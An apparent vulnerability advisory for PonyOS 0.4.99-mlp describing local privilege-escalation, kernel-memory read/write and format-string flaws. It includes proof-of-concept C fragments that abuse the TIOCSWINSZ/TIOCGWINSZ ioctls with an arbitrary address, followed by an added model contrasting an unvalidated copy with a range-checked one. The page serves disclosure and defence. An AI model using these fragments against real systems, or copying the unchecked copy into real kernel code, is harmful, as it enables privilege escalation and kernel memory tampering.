PonyOS Multiple Local Security Vulnerabilities
BID:58822
Info
| Bugtraq ID: | 58822 |
| Class: | Input Validation Error |
| CVE: | |
| Remote: | No |
| Local: | Yes |
| Published: | Apr 03 2013 12:00AM |
| Updated: | Apr 03 2013 12:00AM |
| Credit: | John Cartwright |
| Vulnerable: | |
| Not Vulnerable: | |
Discussion
PonyOS is prone to a local privilege-escalation vulnerability, a local security-bypass vulnerability, and a format-string vulnerability.
An attacker can exploit these issues to gain escalated privileges by executing arbitrary commands with root privileges, to read or write arbitrary data from or to kernel memory, and to execute arbitrary code in the context of the vulnerable application. Failed exploit attempts will likely result in a denial-of-service condition.
PonyOS 0.4.99-mlp is vulnerable; other versions may also be affected.
Exploit / POC
The following example data is available:
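#include <stdio.h>
#include <string.h>
#include <sys/ioctl.h>

/* Fragment 1: TIOCSWINSZ is passed an arbitrary address, then TIOCGWINSZ returns the stored values. */
struct winsize ws;
ioctl(0, TIOCSWINSZ, (void *)0x11223344);
ioctl(0, TIOCGWINSZ, &ws);
printf("%x %x %x %x\n", ws.ws_col, ws.ws_row, ws.ws_xpixel, ws.ws_ypixel);

/* Fragment 2: a zeroed winsize is set, then TIOCGWINSZ is passed an arbitrary address. */
struct winsize ws;
memset(&ws, '\0', sizeof(struct winsize));
ioctl(0, TIOCSWINSZ, &ws);
ioctl(0, TIOCGWINSZ, (void *)0x11223344);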
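The calls above pass an arbitrary address as the ioctl argument; the check that stops this class of bug is a user-range validation before the kernel copies the window size in or out. The following is an added user-space model of that check, not PonyOS code or code from the advisory: the flat memory array, the `USER_LIMIT` split, and the names `ioctl_unchecked`, `ioctl_checked` and `user_range_ok` are all hypothetical, and the unvalidated copy in the first handler is an assumption about the flaw.

```c
#include <errno.h>
#include <stdint.h>
#include <stdio.h>
#include <string.h>

/* Constructed model, not PonyOS code: one flat address space in which
   offsets [0, USER_LIMIT) belong to the caller and the rest to the kernel. */
#define MEM_SIZE   256u
#define USER_LIMIT 128u

struct winsize_model { uint16_t row, col, xpixel, ypixel; };
static uint8_t mem[MEM_SIZE];
static struct winsize_model tty_size;   /* kernel-side window size */
enum { REQ_GET = 1, REQ_SET = 2 };      /* stand-ins for TIOCGWINSZ / TIOCSWINSZ */

/* True only if [addr, addr+len) lies wholly in user memory (no overflow). */
static int user_range_ok(size_t addr, size_t len)
{
    return len <= USER_LIMIT && addr <= USER_LIMIT - len;
}

/* Assumed flaw: the argument is used as a copy source/target unvalidated. */
int ioctl_unchecked(int req, size_t addr)
{
    if (addr > MEM_SIZE - sizeof tty_size) return -EFAULT; /* model bounds only */
    if (req == REQ_SET) memcpy(&tty_size, mem + addr, sizeof tty_size);
    else if (req == REQ_GET) memcpy(mem + addr, &tty_size, sizeof tty_size);
    else return -EINVAL;
    return 0;
}

/* Hardened form: refuse any argument that is not a user-space range. */
int ioctl_checked(int req, size_t addr)
{
    if (req != REQ_GET && req != REQ_SET) return -EINVAL;
    if (!user_range_ok(addr, sizeof tty_size)) return -EFAULT;
    return ioctl_unchecked(req, addr);
}

int main(void)
{
    memcpy(mem + 200, "KSECRET!", 8);   /* constructed kernel-side data */
    ioctl_unchecked(REQ_SET, 200);      /* kernel reads its own memory */
    ioctl_unchecked(REQ_GET, 0);        /* and copies it out to the caller */
    printf("unchecked copied out: %.8s\n", (const char *)mem);
    printf("checked SET on kernel range: %d\n", ioctl_checked(REQ_SET, 200));
    return 0;
}
```

The range test is written as `addr <= USER_LIMIT - len` so that an address near the top of the integer range cannot wrap past the limit, and a range that straddles the user/kernel boundary is rejected as a whole.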
Solution / Fix
Solution:
Currently, we are not aware of any vendor-supplied patches. If you feel we are in error or if you are aware of more recent information, please mail us at: [email protected].
References
References:
- Advisory: PonyOS Security Issues (Full Disclosure)
- PonyOS Homepage (PonyOS)